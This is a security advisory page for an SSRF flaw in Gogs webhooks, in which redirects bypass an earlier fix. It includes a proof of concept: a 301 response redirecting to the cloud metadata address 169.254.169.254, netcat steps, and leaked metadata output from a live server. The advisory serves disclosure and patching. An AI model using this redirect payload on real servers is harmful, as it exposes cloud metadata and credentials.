Search

Find a vulnerability

Search criteria

    Related vulnerabilities

    GHSA-C4V7-XG93-QF8G

    Vulnerability from github – Published: 2026-06-22 22:44 – Updated: 2026-06-22 22:44
    VLAI
    Summary
    Gogs has SSRF in webhook deliveries
    Details

    Summary

    The fix for CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs.

    This was already communicated in the initial report but it looks like there was a bit of a miscommunication.

    Details

    By creating a webook pointing to any URL that will return the following:

    HTTP/1.1 301 Moved Permanently
Location: http://169.254.169.254/metadata/v1.json
Content-Length: 0
Connection: close

    It is possible to access 169.254.169.254

    PoC

    1. Run netcat on any server
    2. Use this server as the webhook URL
    3. Once you get the request from the webhook (for example by testing it), copy the response above

    Results from running this on try.gogs:

    {"droplet_id":456901166,"hostname":"gogs-do-nyc3-01","vendor_data":"Content-Type: multipart/mixed; boundary=\"===============8645434374073493512==\"\nMIME-Version: 1.0\n\n--===============8645434374073493512==\nMIME-Version: 1.0\nContent-Type: text/cloud-config; charset=\"us-ascii\"\nContent-Transfer-Encoding: 7bit\nContent-Disposition: attachment; filename=\"cloud-config\"\n\n#cloud-config\n\n# Enable root and password auth\ndisable_roo...{"dhcp_enabled":false,"vpc_peering_enabled":false},"dotty_status":"running","ssh_info":{"port":22}}

    Impact

    Server Side Request Forgery

    Fix

    The "simplest way" to fix it is most likely to leverage Client.CheckRedirect https://pkg.go.dev/net/http#hdr-Clients_and_Transports to check if the redirect is pointing to a blocked hostname

    Show details on source website
    To clipboard 

    {
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.14.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "gogs.io/gogs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.14.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47267"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-22T22:44:57Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe fix for  CVE-2022-1285 prevents adding webooks or running webhooks with URLs with a hostname that resolves in localCIDRs. However, webhooks still follow redirects allowing to access hostname inside localCIDRs.\n\nThis was already communicated in the initial report but it looks like there was a bit of a miscommunication.\n\n### Details\n\nBy creating a webook pointing to any URL that will return the following:\n\n```\nHTTP/1.1 301 Moved Permanently\nLocation: http://169.254.169.254/metadata/v1.json\nContent-Length: 0\nConnection: close\n```\nIt is possible to access 169.254.169.254\n\n### PoC\n\n1. Run netcat on any server\n2. Use this server as the webhook URL\n3. Once you get the request from the webhook (for example by testing it), copy the response above\n\nResults from running this on try.gogs:\n\n```\n{\"droplet_id\":456901166,\"hostname\":\"gogs-do-nyc3-01\",\"vendor_data\":\"Content-Type: multipart/mixed; boundary=\\\"===============8645434374073493512==\\\"\\nMIME-Version: 1.0\\n\\n--===============8645434374073493512==\\nMIME-Version: 1.0\\nContent-Type: text/cloud-config; charset=\\\"us-ascii\\\"\\nContent-Transfer-Encoding: 7bit\\nContent-Disposition: attachment; filename=\\\"cloud-config\\\"\\n\\n#cloud-config\\n\\n# Enable root and password auth\\ndisable_roo...{\"dhcp_enabled\":false,\"vpc_peering_enabled\":false},\"dotty_status\":\"running\",\"ssh_info\":{\"port\":22}}\n```\n\n### Impact\nServer Side Request Forgery\n\n### Fix\n\nThe \"simplest way\" to fix it is most likely to leverage Client.CheckRedirect https://pkg.go.dev/net/http#hdr-Clients_and_Transports to check if the redirect is pointing to a blocked hostname",
  "id": "GHSA-c4v7-xg93-qf8g",
  "modified": "2026-06-22T22:44:57Z",
  "published": "2026-06-22T22:44:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-c4v7-xg93-qf8g"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/pull/8263"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/commit/199cf4fd5bbe40b92f6dc8d649e241fd7a8d0018"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gogs/gogs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Gogs has SSRF in webhook deliveries"
}